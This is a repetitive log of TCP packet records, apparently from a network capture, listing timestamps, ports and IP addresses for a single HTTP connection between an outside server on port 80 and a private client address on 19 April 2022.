Apr 19, 2022 16:44:44.201375961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201402903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201425076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.201539040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201735973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201761961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201778889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.201812983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.201903105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202035904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202097893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202147961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.202241898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202286959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.202307940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202569962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202589035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202631950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.202709913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.202750921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.202830076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203007936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203027964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203073978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.203154087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203196049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.203275919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203404903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203423977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203465939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.203639984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203691959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203736067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.203816891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.203857899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.203933954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204128027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204148054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204191923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.204370022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204390049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204408884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.204488039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204688072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204706907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.204730034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.204757929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.204833031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205024958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205044031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205073118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.205184937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205226898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.205307961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205449104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205466986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205511093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.205589056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205631018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.205712080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205929995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205949068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.205991030 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.206067085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206106901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.206196070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206331968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206379890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206422091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.206521034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206559896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.206634998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206881046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206899881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206942081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.206952095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.206990004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.207070112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207329035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207348108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207389116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.207516909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207560062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.207591057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207627058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207792044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207845926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.207952023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207971096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.207998991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.208103895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208143950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.208204031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208348036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208581924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208631992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.208641052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208682060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.208713055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208789110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208877087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.208921909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.209096909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209116936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209142923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.209306002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209326029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209350109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.209532976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209552050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209577084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.209816933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209836960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.209867954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.210015059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210033894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210064888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.210149050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210268974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210314989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.210395098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210438967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.210517883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210606098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210817099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210834980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.210871935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.210901976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.210989952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211041927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211091995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.211190939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211373091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211390972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211438894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.211575985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211596012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211621046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.211834908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211854935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.211883068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.212058067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212078094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212102890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.212249994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212270021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212292910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.212533951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212552071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212579012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.212733030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212752104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212779045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.212939978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212956905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.212990999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.213074923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213123083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.213205099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213390112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213498116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213516951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213538885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.213577032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.213778019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213797092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.213854074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.213860035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214046955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214128971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214184046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.214234114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214278936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.214320898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214488029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214535952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214628935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.214736938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214756012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214785099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.214972973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.214991093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215020895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.215189934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215235949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.215240002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215401888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215461016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.215482950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215629101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215682983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215701103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.215888977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215907097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.215931892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.216027021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216069937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.216245890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216263056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216451883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216476917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216492891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.216525078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.216686964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216706991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216866016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216908932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.216921091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.216959953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.217035055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.217199087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.217247963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.217325926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.217377901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.217573881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.217591047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.217622042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.217652082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.218323946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218743086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218763113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218780041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218796968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218815088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218817949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.218833923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218838930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.218852997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218871117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218871117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.218888998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.218903065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.218931913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.218990088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219008923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219055891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.219064951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219337940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219356060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219407082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.219412088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219456911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.219619036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219635963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219685078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.219865084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219882965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.219940901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.220093966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220113039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220299959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220316887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220344067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.220375061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.220545053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220566034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220623016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.220668077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220860004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220877886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.220921993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.221102953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221121073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221147060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.221343994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221363068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221388102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.221586943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221606016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221628904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.221821070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221838951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.221863985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.222023010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222042084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222067118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.222198009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222240925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.222259998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222464085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222481966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222526073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.222702026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222719908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222747087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.222903967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222923040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.222946882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.223144054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223161936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223186970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.223385096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223401070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223424911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.223619938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223638058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223680019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.223783970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223824978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.223941088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.223958015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224142075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224159002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224184990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.224215031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.224381924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224399090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224438906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.224664927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224682093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224740028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.224862099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.224878073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225107908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225125074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225161076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.225189924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.225313902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225333929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225373030 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.225532055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225678921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225697041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225744963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.225868940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225887060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.225910902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.226052046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226115942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226159096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.226303101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226321936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226346016 CEST	49758	80	192.168.2.4	45.135.48.153
